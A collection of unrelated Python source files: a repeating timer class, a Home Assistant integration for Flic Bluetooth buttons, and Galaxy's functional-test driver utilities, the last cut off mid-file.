elif key == 'stderr':
if data is not None:
program._cbs.stderr(data)
elif key == 'kill':
proc.kill()
program._cbs.done(proc.returncode)
|
timer.py | # coding=utf-8
__author__ = 'weiyulan'
import threading
import time
class Timer(object):
"""这是一个可以不断的重复执行一个函数的定时器。"""
def __init__(self, interval, target, args=(), kwargs={}, repeat_times=-1, start_flag=False):
"""构造函数。
Keyword arguments:
interval -- 运行函数的周期。(大于零)
target -- 要运行的函数。
args -- 参数(列表)。
kwargs -- 参数(字典)。
repeat_times -- 循环次数。(-1为无限循环)
start_flag -- 初始化的同时是否开始定时器。
"""
self._interval = 0
self.interval = interval
self.interval_lock = threading.Lock()
if hasattr(target, '__call__') is False:
raise Exception("function应当为一个函数。")
self.target = target
self.repeat_times = repeat_times
self.repeat_times_lock = threading.Lock()
self.pause_lock = threading.Lock()
self.args = args
self.kwargs = kwargs
self.thread_handle = threading.Thread(target=self.worker)
self.thread_handle.setDaemon(True)
if start_flag is True:
self.run()
def run(self):
"""运行计时器。"""
self.thread_handle.start()
def worker(self):
"""计时器的工作线程。"""
while True:
self.pause_lock.acquire() # 处理暂停
self.pause_lock.release()
with self.repeat_times_lock:
self.repeat_times -= 1
if self.repeat_times == -1:
return
self.target(*self.args, # 执行操作
**self.kwargs)
with self.interval_lock:
time.sleep(self.interval)
def pause(self):
"""暂停计时器。"""
self.pause_lock.acquire()
def resume(self):
"""恢复计时器。用于暂停后的计时器。"""
self.pause_lock.release()
def stop(self):
"""停止计时器。"""
with self.repeat_times_lock:
self.repeat_times = 0
def __del__(self):
self.stop()
@property
def interval(self):
return self._interval
@interval.setter
def interval(self, value):
if value > 0.:
self._interval = value
else:
raise ValueError("时间间隔不能小于等于零。")
|
binary_sensor.py | """Support to use flic buttons as a binary sensor."""
from __future__ import annotations
import logging
import threading
import pyflic
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity
from homeassistant.const import (
CONF_DISCOVERY,
CONF_HOST,
CONF_PORT,
CONF_TIMEOUT,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.device_registry import format_mac
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
_LOGGER = logging.getLogger(__name__)
DEFAULT_TIMEOUT = 3
CLICK_TYPE_SINGLE = "single"
CLICK_TYPE_DOUBLE = "double"
CLICK_TYPE_HOLD = "hold"
CLICK_TYPES = [CLICK_TYPE_SINGLE, CLICK_TYPE_DOUBLE, CLICK_TYPE_HOLD]
CONF_IGNORED_CLICK_TYPES = "ignored_click_types"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 5551
EVENT_NAME = "flic_click"
EVENT_DATA_NAME = "button_name"
EVENT_DATA_ADDRESS = "button_address"
EVENT_DATA_TYPE = "click_type"
EVENT_DATA_QUEUED_TIME = "queued_time"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_DISCOVERY, default=True): cv.boolean,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
vol.Optional(CONF_IGNORED_CLICK_TYPES): vol.All(
cv.ensure_list, [vol.In(CLICK_TYPES)]
),
}
)
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the flic platform."""
# Initialize flic client responsible for
# connecting to buttons and retrieving events
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
discovery = config.get(CONF_DISCOVERY)
try:
client = pyflic.FlicClient(host, port)
except ConnectionRefusedError:
_LOGGER.error("Failed to connect to flic server")
return
def new_button_callback(address):
"""Set up newly verified button as device in Home Assistant."""
setup_button(hass, config, add_entities, client, address)
client.on_new_verified_button = new_button_callback
if discovery:
start_scanning(config, add_entities, client)
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, lambda event: client.close())
# Start the pyflic event handling thread
threading.Thread(target=client.handle_events).start()
def get_info_callback(items):
"""Add entities for already verified buttons."""
addresses = items["bd_addr_of_verified_buttons"] or []
for address in addresses:
setup_button(hass, config, add_entities, client, address)
# Get addresses of already verified buttons
client.get_info(get_info_callback)
def start_scanning(config, add_entities, client):
"""Start a new flic client for scanning and connecting to new buttons."""
scan_wizard = pyflic.ScanWizard()
def scan_completed_callback(scan_wizard, result, address, name):
"""Restart scan wizard to constantly check for new buttons."""
if result == pyflic.ScanWizardResult.WizardSuccess:
_LOGGER.info("Found new button %s", address)
elif result != pyflic.ScanWizardResult.WizardFailedTimeout:
_LOGGER.warning(
"Failed to connect to button %s. Reason: %s", address, result
)
# Restart scan wizard
start_scanning(config, add_entities, client)
scan_wizard.on_completed = scan_completed_callback
client.add_scan_wizard(scan_wizard)
def setup_button(hass, config, add_entities, client, address):
"""Set up a single button device."""
timeout = config.get(CONF_TIMEOUT)
ignored_click_types = config.get(CONF_IGNORED_CLICK_TYPES)
button = FlicButton(hass, client, address, timeout, ignored_click_types)
_LOGGER.info("Connected to button %s", address)
add_entities([button])
class FlicButton(BinarySensorEntity):
"""Representation of a flic button."""
def __init__(self, hass, client, address, timeout, ignored_click_types):
"""Initialize the flic button."""
self._attr_unique_id = format_mac(address)
self._hass = hass
self._address = address
self._timeout = timeout
self._is_down = False
self._ignored_click_types = ignored_click_types or []
self._hass_click_types = {
pyflic.ClickType.ButtonClick: CLICK_TYPE_SINGLE,
pyflic.ClickType.ButtonSingleClick: CLICK_TYPE_SINGLE,
pyflic.ClickType.ButtonDoubleClick: CLICK_TYPE_DOUBLE,
pyflic.ClickType.ButtonHold: CLICK_TYPE_HOLD,
}
self._channel = self._create_channel()
client.add_connection_channel(self._channel)
def _create_channel(self):
"""Create a new connection channel to the button."""
channel = pyflic.ButtonConnectionChannel(self._address)
channel.on_button_up_or_down = self._on_up_down
# If all types of clicks should be ignored, skip registering callbacks
if set(self._ignored_click_types) == set(CLICK_TYPES):
return channel
if CLICK_TYPE_DOUBLE in self._ignored_click_types:
# Listen to all but double click type events
channel.on_button_click_or_hold = self._on_click
elif CLICK_TYPE_HOLD in self._ignored_click_types:
# Listen to all but hold click type events
channel.on_button_single_or_double_click = self._on_click
else:
# Listen to all click type events
channel.on_button_single_or_double_click_or_hold = self._on_click
return channel
@property
def name(self):
"""Return the name of the device."""
return f"flic_{self.address.replace(':', '')}"
@property
def address(self):
"""Return the bluetooth address of the device."""
return self._address
@property
def is_on(self):
"""Return true if sensor is on."""
return self._is_down
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def extra_state_attributes(self):
"""Return device specific state attributes."""
return {"address": self.address}
def _queued_event_check(self, click_type, time_diff):
"""Generate a log message and returns true if timeout exceeded."""
time_string = f"{time_diff:d} {'second' if time_diff == 1 else 'seconds'}"
if time_diff > self._timeout:
_LOGGER.warning(
"Queued %s dropped for %s. Time in queue was %s",
click_type,
self.address,
time_string,
)
return True
_LOGGER.info(
"Queued %s allowed for %s. Time in queue was %s",
click_type,
self.address,
time_string,
)
return False
def _on_up_down(self, channel, click_type, was_queued, time_diff):
"""Update device state, if event was not queued."""
if was_queued and self._queued_event_check(click_type, time_diff):
return
self._is_down = click_type == pyflic.ClickType.ButtonDown
self.schedule_update_ha_state()
def _on_click(self, channel, click_type, was_queued, time_diff):
"""Fire click event, if event was not queued."""
# Return if click event was queued beyond allowed timeout
if was_queued and self._queued_event_check(click_type, time_diff):
return
# Return if click event is in ignored click types
hass_click_type = self._hass_click_types[click_type]
if hass_click_type in self._ignored_click_types:
return
self._hass.bus.fire(
EVENT_NAME,
{
EVENT_DATA_NAME: self.name,
EVENT_DATA_ADDRESS: self.address,
EVENT_DATA_QUEUED_TIME: time_diff,
EVENT_DATA_TYPE: hass_click_type,
},
)
def _connection_status_changed(self, channel, connection_status, disconnect_reason):
"""Remove device, if button disconnects."""
if connection_status == pyflic.ConnectionStatus.Disconnected:
_LOGGER.warning(
"Button (%s) disconnected. Reason: %s", self.address, disconnect_reason
)
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import collections
import fcntl
import httplib
import json
import logging
import os
import random
import shutil
import socket
import struct
import sys
import tempfile
import threading
import time
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
from paste import httpserver
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.util import asbool, download_to_file
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy.webapps.tool_shed.app import UniverseApplication as ToolshedUniverseApplication
from .api_util import get_master_api_key, get_user_api_key
from .instrument import StructuredTestDataPlugin
from .nose_util import run
from .test_logging import logging_config_file
from .tool_shed_util import parse_tool_panel_config
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
DEFAULT_WEB_HOST = "localhost"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(GALAXY_TEST_DIRECTORY, "shed_functional", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = tempfile.mkdtemp()
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ['TOOL_SHED_TEST_TMP_DIR'] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
):
"""Setup environment and build config for test Galaxy instance."""
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
file_path = os.path.join(tmpdir, 'files')
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR', None)
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp(dir=tmpdir, prefix="tool_dependencies")
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
master_api_key = get_master_api_key()
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = "%s,%s" % (tool_conf, shed_tool_conf)
shed_tool_data_table_config = default_shed_tool_data_table_config
if shed_tool_data_table_config is None:
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
conda_auto_init=False,
cleanup_job='onsuccess',
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
file_path=file_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_conf,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
)
config.update(database_conf(tmpdir))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff - todo read from
# Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir
return config
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherise find whatever Galaxy would use as the default and
# the sample data for fucntional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=[], plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception("Failed to copy database template from source %s" % source)
def database_conf(db_path, prefix="GALAXY"):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
dburi_var = "%s_TEST_DBURI" % prefix
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
return config
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'june_2007_style', 'blue'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for i in range(10):
# directly test the app, not the proxy
conn = httplib.HTTPConnection(host, port)
conn.request("GET", "/")
if conn.getresponse().status == 200:
break
time.sleep(0.1)
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running one.
"""
server = None
if port is not None:
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
else:
random.seed()
for i in range(0, 9):
try:
port = str(random.randint(8000, 10000))
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
break
except socket.error as e:
if e[0] == 98:
continue
raise
else:
raise Exception("Unable to open a port between %s and %s to start Galaxy server" % (8000, 1000))
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info("GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir)
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = os.path.join(tmpdir, 'shed_tools_dict')
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config(MIGRATED_TOOL_PANEL_CONFIG, shed_tools_dict)
elif testing_installed_tools:
for shed_tool_config in INSTALLED_TOOL_PANEL_CONFIGS:
has_test_data, shed_tools_dict = parse_tool_panel_config(shed_tool_config, shed_tools_dict)
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
with open(galaxy_tool_shed_test_file, 'w') as shed_tools_file:
shed_tools_file.write(json.dumps(shed_tools_dict))
if not os.path.isabs(galaxy_tool_shed_test_file):
galaxy_tool_shed_test_file = os.path.join(galaxy_root, galaxy_tool_shed_test_file)
os.environ['GALAXY_TOOL_SHED_TEST_FILE'] = galaxy_tool_shed_test_file
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "config/galaxy.ini.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.ini.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
ServerWrapper = collections.namedtuple('ServerWrapper', ['app', 'server', 'name', 'host', 'port'])
def _stop(self):
if self.server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self.server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self.app is not None:
log.info("Stopping application %s" % self.name)
self.app.shutdown()
log.info("Application %s stopped." % self.name)
ServerWrapper.stop = _stop
class classproperty(object):
def __init__(self, f):
self.f = f
def __get__(self, obj, owner):
return self.f(owner)
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def launch_server(app, webapp_factory, kwargs, prefix="GALAXY", config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
port = os.environ.get(port_env_key, None)
webapp = webapp_factory(
kwargs['global_conf'],
app=app,
use_translogger=False,
static_enabled=True
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port)
log.info("Embedded web server for %s started" % name)
return ServerWrapper(
app, server, name, host, port
)
class TestDriver(object):
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
if config_object is None:
config_object = self
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
if self.external_galaxy is None:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if hasattr(galaxy_config, '__call__'):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=default_tool_conf,
datatypes_conf=datatypes_conf_override,
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
handle_galaxy_config_kwds = getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
self.server_wrappers.append(server_wrapper)
log.info("Functional tests will be run against external Galaxy server %s:%s" % (server_wrapper.host, server_wrapper.port))
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
